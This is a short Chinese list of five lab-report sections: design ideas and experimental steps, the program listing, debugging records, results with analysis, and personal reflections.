(1) 写 出 设计 思想 和 实验 步 又。 

(2) 给 出 程序 清单 。 

(3) 实验 调试 记录 。 

(4) 实验 结果 及 其 分 析 。 

(5) 实验 心得 体会 。 
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